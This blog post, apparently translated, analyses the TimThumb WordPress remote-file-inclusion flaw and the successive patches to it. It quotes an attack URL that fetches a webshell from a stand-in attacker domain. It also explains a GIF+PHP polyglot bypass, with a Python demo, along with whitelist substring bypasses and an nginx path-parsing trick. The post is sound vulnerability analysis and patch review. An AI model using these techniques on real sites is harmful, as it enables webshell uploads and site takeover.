A few days ago a vulnerability in the WordPress TimThumb script was disclosed outside China. Many WordPress themes bundle this script, including some paid themes sold in China. I will not name them here, so as not to hand attackers a list of blogs to hit.
http://code.google.com/p/timthumb/source/browse/trunk/timthumb.php?spec=svn140&r=140
The script's main job is to fetch remote images and cache them locally. The vulnerability sits in the branch that handles external images: it downloads the remote file with cURL and saves it into the cache directory as is. Let's look at the context in the source first. To reach that branch, the image URL only has to contain one of the following domain names (a plain substring check on the URL):
$allowedSites = array(
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
    'upload.wikimedia.org',
    'photobucket.com',
);
The crux of the vulnerability is the name under which the downloaded file is saved.
$file_details = pathinfo($src);
$filename = 'external_' . md5($src);
$local_filepath = DIRECTORY_CACHE . '/' . $filename . '.' . $file_details['extension'];
// $local_filepath is 'external_' . md5($src) followed by '.' . $file_details['extension']
If $src is http://www.bkjia.com/x.php, pathinfo() takes the .php suffix straight from $src, so the cached file is named external_<md5($src)>.php: the extension is copied from an attacker-supplied URL into a file that lands in the web-reachable cache directory.
An attacker therefore only needs to request timthumb.php?src=http://wordpress.com.hacker.com/webshell.php. The URL contains the whitelisted string wordpress.com, the file is actually fetched from hacker.com, and it is written to the cache as a .php file.
Now for the fix. The Google Code diffs are the easiest way to follow it:
1. http://code.google.com/p/timthumb/source/diff?spec=svn141&r=141&format=side&path=/trunk/timthumb.php
OK. In r141 the author noticed that a file with a .php suffix was being saved as an "image" and added a content check.
$file_infos = getimagesize($local_filepath); // getimagesize() is used to check whether the downloaded file is really an image
if (empty($file_infos['mime']) || !preg_match("/jpg|jpeg|gif|png/i", $mime_type))
// the suffix-derived MIME type is then matched against the image types by regex; $mime_type is set earlier in the program:
$mime_type = mime_type($src);
I won't go into mime_type(); it simply derives a MIME type from the file suffix of $src. If the condition fails, the downloaded file is deleted.
As you can see, this check is basically useless. PHP code can be hidden inside a valid image by simple binary concatenation: getimagesize() only inspects the image header, so a GIF with PHP appended still passes as image/gif, and the suffix check is satisfied by naming the file .gif. Hence the second round of fixes.
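To make the "binary merge" concrete, here is an added example (my own Python, not TimThumb's code) that builds a constructed 1x1 GIF, appends an inert PHP tag, and runs it through a header-only sniffer modelled on what getimagesize() does, alongside a model of the r141 condition. It also shows the stricter alternative a practitioner would want: walking the GIF block structure and rejecting any file that has bytes after the trailer. The function names (sniff_image_mime, r141_check, gif_has_only_image_data) are mine.

```python
import re

# Constructed sample input: a minimal, structurally valid 1x1 GIF89a (35 bytes).
GIF_1X1 = (
    b"GIF89a"                                    # header
    b"\x01\x00\x01\x00\x80\x00\x00"              # logical screen 1x1, global colour table of 2 entries
    b"\x00\x00\x00\xff\xff\xff"                  # colour table: black, white
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor, no local colour table
    b"\x02\x02\x44\x01\x00"                      # LZW min code size 2, one data sub-block, terminator
    b"\x3b"                                      # trailer
)
# The "binary merge": PHP source appended after the trailer. Inert text here, never executed.
PHP_TAIL = b"<?php echo 'polyglot'; ?>"


def sniff_image_mime(data: bytes):
    """Header-only type detection, the way getimagesize() decides a file is an image:
    only the magic bytes are examined, nothing after them."""
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "image/gif"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    return None


def r141_check(data: bytes, suffix_mime: str) -> bool:
    """Model of the r141 condition: the file must sniff as an image AND the MIME type
    derived from the URL suffix must match jpg|jpeg|gif|png. Both are attacker-controlled."""
    if sniff_image_mime(data) is None:
        return False
    return re.search(r"jpg|jpeg|gif|png", suffix_mime, re.I) is not None


def contains_php(data: bytes) -> bool:
    return b"<?php" in data


def gif_has_only_image_data(data: bytes) -> bool:
    """Stricter alternative: walk the GIF block structure and accept the file only if the
    trailer byte (0x3B) is the very last byte, so nothing can be appended."""
    if not data.startswith((b"GIF87a", b"GIF89a")) or len(data) < 13:
        return False

    def skip_subblocks(p):
        # data sub-blocks: <length><bytes>... terminated by a zero-length block
        while p < len(data):
            n = data[p]
            p += 1
            if n == 0:
                return p
            p += n
        return None

    packed = data[10]
    pos = 13
    if packed & 0x80:                      # global colour table present
        pos += 3 << ((packed & 0x07) + 1)  # 3 bytes * 2^(n+1) entries
    while pos is not None and pos < len(data):
        block = data[pos]
        if block == 0x3B:                  # trailer: must be the last byte
            return pos + 1 == len(data)
        if block == 0x2C:                  # image descriptor
            if pos + 10 > len(data):
                return False
            ipacked = data[pos + 9]
            pos += 10
            if ipacked & 0x80:             # local colour table
                pos += 3 << ((ipacked & 0x07) + 1)
            pos = skip_subblocks(pos + 1)  # +1 skips the LZW minimum code size
        elif block == 0x21:                # extension: label byte, then sub-blocks
            pos = skip_subblocks(pos + 2)
        else:
            return False
    return False


def demo():
    polyglot = GIF_1X1 + PHP_TAIL
    return {
        "sniffed_as": sniff_image_mime(polyglot),
        "passes_r141": r141_check(polyglot, "image/gif"),  # suffix MIME as for a URL ending in .gif
        "contains_php": contains_php(polyglot),
        "strict_accepts_clean": gif_has_only_image_data(GIF_1X1),
        "strict_accepts_polyglot": gif_has_only_image_data(polyglot),
    }


if __name__ == "__main__":
    print(demo())
```

The polyglot sniffs as image/gif and passes the r141 model while still carrying the PHP tag; the structural walk rejects it because 25 bytes follow the trailer. Full structural validation (or re-encoding the image) is the content-side defence; the naming fix that follows removes the reason to care.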
2. http://code.google.com/p/timthumb/source/diff?spec=svn142&r=142&format=side&path=/trunk/timthumb.php
$filename = 'external_' . md5($src);
$local_filepath = DIRECTORY_CACHE . '/' . $filename;
// the author finally fixes the root cause: the cached file is named 'external_' . md5($src), with no extension taken from the URL
3. http://code.google.com/p/timthumb/source/diff?spec=svn143&r=143&format=side&path=/trunk/timthumb.php
But is that the end of it? Not quite. With the nginx file-type parsing vulnerability disclosed by 80sec in mind (on a misconfigured nginx/PHP stack an image in the cache directory can still be executed as PHP by appending /x.php to its path), the author next turned to the trustworthiness of the image source, i.e. the whitelist check.
$url_info['host'] is obtained with parse_url().
if (strpos(strtolower($url_info['host'] . '/'), $site) != false)
// the whitelist is now matched against the host component rather than by a plain substring search over the whole URL
This is still a substring test, though: a host such as www.wordpress.com.hacker.com contains wordpress.com and passes. (Note also that as written, with a loose != false, a match at offset 0 compares equal to false and counts as no match.)
4. http://code.google.com/p/timthumb/source/diff?spec=svn144&r=144&format=side&path=/trunk/timthumb.php
The author switches to a neater way of matching the host: the whitelisted domain must be the end of the host name, preceded by either the start of the string or a dot.
if (preg_match('/(?:^|\.)' . $site . '$/i', $url_info['host']))
One hygiene note: $site is interpolated into the pattern unescaped, so its dots match any character; wrapping it in preg_quote() makes them literal.
5. http://code.google.com/p/timthumb/source/diff?spec=svn145&r=145&format=side&path=/trunk/timthumb.php
The author found that images from blogger.com, wordpress.com and photobucket.com cannot be trusted either (anyone can host content under those domains), so those three entries were removed from the whitelist.
6. http://code.google.com/p/timthumb/source/diff?spec=svn148&r=148&format=side&path=/trunk/timthumb.php
Finally, a footnote.
touch(DIRECTORY_CACHE . '/index.php');
The author worried that the web server might list the cache directory, letting a later attacker find the webshells earlier attackers had already left behind, so an empty index.php is created there to suppress the listing.
PS: One more sigh. That is what security is like; you have to admit programmers have a hard time.
This article is from: xuexiao blog